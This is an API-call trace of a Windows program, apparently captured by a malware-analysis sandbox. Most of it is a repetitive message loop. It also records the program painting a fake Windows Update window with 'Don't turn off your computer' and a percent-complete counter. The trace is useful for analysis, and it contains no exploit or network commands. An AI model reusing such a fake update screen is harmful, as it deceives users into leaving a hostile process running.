[0082.013] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.014] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.014] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.014] TranslateMessage (lpMsg=0x18e548) returned 0 [0082.014] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.015] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.060] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.060] TranslateMessage (lpMsg=0x18e548) returned 0 [0082.060] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.060] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.060] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.060] TranslateMessage (lpMsg=0x18e548) returned 0 [0082.060] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.062] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.107] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.107] TranslateMessage (lpMsg=0x18e548) returned 0 [0082.107] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.107] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.107] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.107] TranslateMessage (lpMsg=0x18e548) returned 0 [0082.107] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.108] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.201] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.201] TranslateMessage (lpMsg=0x18e548) returned 0 [0082.201] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.201] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.201] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.201] TranslateMessage (lpMsg=0x18e548) returned 0 [0082.201] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.202] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.248] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.248] TranslateMessage (lpMsg=0x18e548) returned 0 [0082.248] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.248] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.248] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.248] TranslateMessage (lpMsg=0x18e548) returned 0 [0082.248] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.249] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0082.295] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0082.295] TranslateMessage (lpMsg=0x18e548) returned 0 [0082.295] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0082.295] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.261] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.262] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.262] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.262] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.308] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.308] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.308] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.309] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.309] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.309] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.309] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.310] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.355] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.355] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.355] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.355] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.355] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.355] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.355] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.357] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.402] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.402] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.402] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.402] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.402] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.402] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.402] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.403] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.449] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.449] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.449] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.449] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.449] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.449] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.449] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.450] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.495] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.496] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.496] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.496] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.496] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.496] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.496] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.497] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.542] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.542] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.542] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.542] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.542] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.542] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.542] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.543] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.589] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.589] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.589] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.590] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.590] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.590] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.590] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.591] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.636] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.636] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.636] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.636] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.636] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.636] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.636] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.637] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.683] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.683] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.683] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.683] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.683] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.683] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.683] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.684] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.730] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.730] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.730] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.730] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.730] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.730] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.730] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.731] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.776] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.776] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.776] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.776] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.776] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.776] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.776] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.778] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.857] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.857] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.857] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.857] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.857] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.857] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.857] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.858] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.901] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0083.901] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.901] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.901] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.326] TranslateAcceleratorW (hWnd=0xb027e, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.326] TranslateMessage (lpMsg=0x18e548) returned 1 [0084.326] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.326] NtdllDefWindowProc_W () returned 0x0 [0084.326] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.333] NtdllDefWindowProc_W () returned 0x1 [0084.334] NtdllDefWindowProc_W () returned 0x0 [0084.334] NtdllDefWindowProc_W () returned 0x0 [0084.335] NtdllDefWindowProc_W () returned 0x0 [0084.335] NtdllDefWindowProc_W () returned 0x0 [0084.335] NtdllDefWindowProc_W () returned 0x0 [0084.335] TranslateAcceleratorW (hWnd=0xb027e, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.335] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.335] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.335] BeginPaint (in: hWnd=0xb027e, lpPaint=0x18e2e0 | out: lpPaint=0x18e2e0) returned 0xe010a21 [0084.335] NtdllDefWindowProc_W () returned 0x0 [0084.336] NtdllDefWindowProc_W () returned 0x1 [0084.336] EndPaint (hWnd=0xb027e, lpPaint=0x18e2e0) returned 1 [0084.336] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.336] TranslateAcceleratorW (hWnd=0x7001c, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.336] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.336] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.336] BeginPaint (in: hWnd=0x7001c, lpPaint=0x18d9c8 | out: lpPaint=0x18d9c8) returned 0xe010a21 [0084.337] CreateSolidBrush (color=0x5b3ef) returned 0xaf1007eb [0084.337] FillRect (hDC=0xe010a21, lprc=0x18d9b8, hbr=0xaf1007eb) returned 1 [0084.337] DeleteObject (ho=0xaf1007eb) returned 1 [0084.337] DrawIcon (hDC=0xe010a21, X=7, Y=7, hIcon=0x602ad) returned 1 [0084.337] CreateFontW (cHeight=-19, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x780a0853 [0084.337] SelectObject (hdc=0xe010a21, h=0x780a0853) returned 0x18a002e [0084.337] SetBkMode (hdc=0xe010a21, mode=1) returned 2 [0084.337] lstrlenW (lpString="Installing important updates Windows.") returned 37 [0084.337] TextOutW (hdc=0xe010a21, x=55, y=10, lpString="Installing important updates Windows.", c=37) returned 1 [0084.337] SelectObject (hdc=0xe010a21, h=0x18a002e) returned 0x780a0853 [0084.337] CreateSolidBrush (color=0xffffff) returned 0xb01007eb [0084.337] FillRect (hDC=0xe010a21, lprc=0x18d9a8, hbr=0xb01007eb) returned 1 [0084.337] DeleteObject (ho=0xb01007eb) returned 1 [0084.337] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x2f0a06ae [0084.338] SelectObject (hdc=0xe010a21, h=0x2f0a06ae) returned 0x18a002e [0084.338] SetBkMode (hdc=0xe010a21, mode=1) returned 1 [0084.338] lstrlenW (lpString="Getting your update ready.") returned 26 [0084.338] TextOutW (hdc=0xe010a21, x=52, y=60, lpString="Getting your update ready.", c=26) returned 1 [0084.338] lstrlenW (lpString="Configuring update for Windows.") returned 31 [0084.338] TextOutW (hdc=0xe010a21, x=52, y=77, lpString="Configuring update for Windows.", c=31) returned 1 [0084.338] lstrlenW (lpString="Don't turn off your computer or close it.") returned 41 [0084.338] TextOutW (hdc=0xe010a21, x=52, y=94, lpString="Don't turn off your computer or close it.", c=41) returned 1 [0084.338] SelectObject (hdc=0xe010a21, h=0x18a002e) returned 0x2f0a06ae [0084.338] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=700, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x1c0a0775 [0084.339] SelectObject (hdc=0xe010a21, h=0x1c0a0775) returned 0x18a002e [0084.339] SetBkMode (hdc=0xe010a21, mode=1) returned 1 [0084.339] SetTextAlign (hdc=0xe010a21, align=0x6) returned 0x0 [0084.339] wsprintfW (in: param_1=0x18da08, param_2="Percent complete: %i%%" | out: param_1="Percent complete: 4%") returned 20 [0084.339] lstrlenW (lpString="Percent complete: 4%") returned 20 [0084.339] TextOutW (hdc=0xe010a21, x=209, y=111, lpString="Percent complete: 4%", c=20) returned 1 [0084.339] SelectObject (hdc=0xe010a21, h=0x18a002e) returned 0x1c0a0775 [0084.339] EndPaint (hWnd=0x7001c, lpPaint=0x18d9c8) returned 1 [0084.339] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.339] TranslateAcceleratorW (hWnd=0x50018, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.339] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.339] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.344] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.344] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.344] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.344] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.345] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.510] TranslateAcceleratorW (hWnd=0x401b4, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.510] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.510] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.510] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.635] TranslateAcceleratorW (hWnd=0x301b6, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.635] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.635] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.635] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.862] TranslateAcceleratorW (hWnd=0xb027e, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.862] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.862] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.862] BeginPaint (in: hWnd=0xb027e, lpPaint=0x18e2e0 | out: lpPaint=0x18e2e0) returned 0xe010a21 [0084.862] NtdllDefWindowProc_W () returned 0x0 [0084.863] NtdllDefWindowProc_W () returned 0x1 [0084.864] EndPaint (hWnd=0xb027e, lpPaint=0x18e2e0) returned 1 [0084.864] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.864] TranslateAcceleratorW (hWnd=0x7001c, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.864] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.864] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.864] BeginPaint (in: hWnd=0x7001c, lpPaint=0x18d9c8 | out: lpPaint=0x18d9c8) returned 0xe010a21 [0084.864] CreateSolidBrush (color=0x5b3ef) returned 0xb11007eb [0084.864] FillRect (hDC=0xe010a21, lprc=0x18d9b8, hbr=0xb11007eb) returned 1 [0084.864] DeleteObject (ho=0xb11007eb) returned 1 [0084.865] DrawIcon (hDC=0xe010a21, X=7, Y=7, hIcon=0x602ad) returned 1 [0084.865] CreateFontW (cHeight=-19, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x480a0a08 [0084.865] SelectObject (hdc=0xe010a21, h=0x480a0a08) returned 0x18a002e [0084.865] SetBkMode (hdc=0xe010a21, mode=1) returned 2 [0084.865] lstrlenW (lpString="Installing important updates Windows.") returned 37 [0084.865] TextOutW (hdc=0xe010a21, x=55, y=10, lpString="Installing important updates Windows.", c=37) returned 1 [0084.865] SelectObject (hdc=0xe010a21, h=0x18a002e) returned 0x480a0a08 [0084.865] CreateSolidBrush (color=0xffffff) returned 0xb21007eb [0084.865] FillRect (hDC=0xe010a21, lprc=0x18d9a8, hbr=0xb21007eb) returned 1 [0084.865] DeleteObject (ho=0xb21007eb) returned 1 [0084.865] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x150a0a34 [0084.865] SelectObject (hdc=0xe010a21, h=0x150a0a34) returned 0x18a002e [0084.865] SetBkMode (hdc=0xe010a21, mode=1) returned 1 [0084.865] lstrlenW (lpString="Getting your update ready.") returned 26 [0084.865] TextOutW (hdc=0xe010a21, x=52, y=60, lpString="Getting your update ready.", c=26) returned 1 [0084.865] lstrlenW (lpString="Configuring update for Windows.") returned 31 [0084.865] TextOutW (hdc=0xe010a21, x=52, y=77, lpString="Configuring update for Windows.", c=31) returned 1 [0084.865] lstrlenW (lpString="Don't turn off your computer or close it.") returned 41 [0084.865] TextOutW (hdc=0xe010a21, x=52, y=94, lpString="Don't turn off your computer or close it.", c=41) returned 1 [0084.866] SelectObject (hdc=0xe010a21, h=0x18a002e) returned 0x150a0a34 [0084.866] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=700, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x90a0a0c [0084.866] SelectObject (hdc=0xe010a21, h=0x90a0a0c) returned 0x18a002e [0084.866] SetBkMode (hdc=0xe010a21, mode=1) returned 1 [0084.866] SetTextAlign (hdc=0xe010a21, align=0x6) returned 0x0 [0084.866] wsprintfW (in: param_1=0x18da08, param_2="Percent complete: %i%%" | out: param_1="Percent complete: 4%") returned 20 [0084.866] lstrlenW (lpString="Percent complete: 4%") returned 20 [0084.866] TextOutW (hdc=0xe010a21, x=209, y=111, lpString="Percent complete: 4%", c=20) returned 1 [0084.866] SelectObject (hdc=0xe010a21, h=0x18a002e) returned 0x90a0a0c [0084.866] EndPaint (hWnd=0x7001c, lpPaint=0x18d9c8) returned 1 [0084.866] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.866] TranslateAcceleratorW (hWnd=0x50018, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.866] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.867] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.868] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.868] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0084.868] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.868] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.869] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.055] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.055] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.056] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.056] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.102] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.102] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.102] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.102] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.102] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.102] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.102] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.104] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.150] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.150] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.150] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.150] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.150] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.150] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.150] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.152] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.196] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0085.196] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.196] 